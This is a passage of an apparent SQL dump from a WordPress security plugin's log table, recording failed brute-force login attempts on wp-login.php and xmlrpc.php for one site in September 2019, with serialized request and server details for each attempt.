Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"104.248.40.97\";s:11:\"REMOTE_PORT\";s:5:\"22664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4qghTPYOiG2TtxVKriFgAAAUM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567500930.7331\";s:12:\"REQUEST_TIME\";s:10:\"1567500930\";}}','notice','2019-09-03 08:55:34','2019-09-03 08:55:31',18204040,19501848,'https://bintara.com.my/xmlrpc.php',1,0,'104.248.40.97'),(23598,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.140.192\";s:11:\"REMOTE_PORT\";s:5:\"47084\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4wYJdGu22A8XWGoSAk7QAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567502432.7276\";s:12:\"REQUEST_TIME\";s:10:\"1567502432\";}}','notice','2019-09-03 09:20:37','2019-09-03 09:20:33',17684376,19176632,'https://bintara.com.my/wp-login.php',1,0,'142.93.140.192'),(23599,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.140.192\";s:11:\"REMOTE_PORT\";s:5:\"47616\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW4wZ-vBZa9wQiMAqP3KMwAAAEo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567502439.5049\";s:12:\"REQUEST_TIME\";s:10:\"1567502439\";}}','notice','2019-09-03 09:20:47','2019-09-03 09:20:40',18291752,19589048,'https://bintara.com.my/xmlrpc.php',1,0,'142.93.140.192'),(23600,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.127.108\";s:11:\"REMOTE_PORT\";s:5:\"35206\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW48QxTPYOiG2TtxVKrwUAAAAVU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567505475.4902\";s:12:\"REQUEST_TIME\";s:10:\"1567505475\";}}','notice','2019-09-03 10:11:17','2019-09-03 10:11:16',17687992,19179528,'https://bintara.com.my/wp-login.php',1,0,'104.238.127.108'),(23601,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.127.108\";s:11:\"REMOTE_PORT\";s:5:\"35718\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW48RxTPYOiG2TtxVKrwUgAAAVQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567505479.3941\";s:12:\"REQUEST_TIME\";s:10:\"1567505479\";}}','notice','2019-09-03 10:11:22','2019-09-03 10:11:19',18203344,19500312,'https://bintara.com.my/xmlrpc.php',1,0,'104.238.127.108'),(23602,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.73.112\";s:11:\"REMOTE_PORT\";s:5:\"45210\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5BgYPBR0Qpy6701ffn0AAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567506817.9508\";s:12:\"REQUEST_TIME\";s:10:\"1567506817\";}}','notice','2019-09-03 10:33:40','2019-09-03 10:33:38',17690032,19181712,'https://bintara.com.my/wp-login.php',1,0,'104.238.73.112'),(23603,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.73.112\";s:11:\"REMOTE_PORT\";s:5:\"45742\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5BhhTPYOiG2TtxVKrzkQAAAUM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567506822.7118\";s:12:\"REQUEST_TIME\";s:10:\"1567506822\";}}','notice','2019-09-03 10:33:45','2019-09-03 10:33:43',18203856,19502384,'https://bintara.com.my/xmlrpc.php',1,0,'104.238.73.112'),(23604,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.170.164.138\";s:11:\"REMOTE_PORT\";s:5:\"39779\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5G4hTPYOiG2TtxVKr2fQAAAVE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567508194.5919\";s:12:\"REQUEST_TIME\";s:10:\"1567508194\";}}','notice','2019-09-03 10:56:36','2019-09-03 10:56:35',17689152,19175352,'https://bintara.com.my/wp-login.php',1,0,'178.170.164.138'),(23605,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.170.164.138\";s:11:\"REMOTE_PORT\";s:5:\"39779\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5G4hTPYOiG2TtxVKr2fQAAAVE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567508194.5919\";s:12:\"REQUEST_TIME\";s:10:\"1567508194\";}}','notice','2019-09-03 10:56:37','2019-09-03 10:56:35',17850336,19175352,'https://bintara.com.my/wp-login.php',1,0,'178.170.164.138'),(23606,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 